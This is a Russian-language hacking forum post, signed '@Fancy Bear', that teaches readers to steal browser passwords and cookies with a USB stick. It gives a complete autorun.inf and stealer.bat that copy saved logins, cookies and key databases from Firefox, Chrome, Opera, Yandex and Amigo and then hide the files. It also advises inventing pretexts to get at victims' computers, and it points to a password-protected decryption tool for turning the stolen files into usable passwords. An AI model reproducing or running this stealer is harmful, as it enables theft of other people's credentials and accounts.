- Сообщения
- 179
- Реакции
- 293
Стиллер ворует cookie с браузера и с помощью специальной программы расшифровывает их. На выходе вы получаете готовые пароли. Для тех кто в бункере: сookie-файлы – зашифрованные текстовые документы, в которых хранится основная информация о пользователе, который использует браузер. В эту информацию входит статистика использования браузера, персональные настройки, сохранённые логины и пароли, а также многое другое.
Плюсы и минусы способа
Минусы:
Есть смысл стиллить куки только тогда, когда вы уверены, что жертва сохраняет пароли в браузере.
Несовместимость с WINDOWS 10, и последними версиями семёрки
Плюсы:
Метод не палится антивирусом.
Кто бы что ни говорил, а человека взломать легче, чем компьютер. Предлогов может быть море. Попросить друга прийти к нему с флешкой, и скачать музыку и тд.
Инструкция:
1. Создаём на флешке 2 текстовых файла. Первый называем “autorun.inf” а второй – “stealer.bat” *.bat - исполняемое расширение файла. То есть его можно использовать как программу.В первый прописываем такие строчки:
[AutoRun]Open=”stealer.bat”
Первый файл отвечает за автозапуск стиллера.
Второй непосредственно сам стиллер. Его следует наполнить такими строчками:
@Echo off
md %~d0\Mozilla
md %~d0\0pera
md %~d0\Google
md %~d0\Yandex
md %~d0\Amigo
CD/D %APPDATA%\Opera\Opera\
cls
copy /y wand.dat %~d0\Opera\
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
cls
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"
cls
ATTRIB -R -A -S -H
attrib +h %~d0\Mozilla
attrib +h %~d0\Opera
attrib +h %~d0\Google
attrib +h %~d0\Yandex
attrib +h %~d0\Amigo
attrib +h %~d0\search.bat
attrib +h %~d0\new
attrib +h %~d0\autorun.inf
del: autorun.inf?
2. После этого "скрываем" получившиеся файлы, и можем идти стиллить пароли и после того, как операция выполнена успешно - возвращаемся домой, через "Панель управления->Оформление и персонализация->Показ скрытых папок и файлов" отображаем скрытые на флешке файлы.
Свои куки на своём компьютере удаляем, или скидываем на флешку. А на их место копируем полученные.
3. Теперь Скачиваем
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
(пароль от архива: wbpv28821@). Лично я использовал портативную версию. В этой программе уже ничего не надо нажимать - она сама загрузит и расшифрует куки из ваших браузеров. Напоминаю, не забудьте заменить свои файлы на полученные!
Возвращаясь к минусам, описанным выше следует решить какой способ стиллинга использовать. Если у жертвы стоит последняя версия винды семёрки, или вообще десятка, тогда стиллинг лучше всего осуществлять вручную. То есть надо прийти к жертве домой, естественно заранее придумав предлог, подключить флешку к ПК, и запустить батник вручную.
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
|
Пожалуйста Войдите или Зарегистрируйтесь чтобы видеть скрытые ссылки.
С уважением
@Fancy Bear
Последнее редактирование:
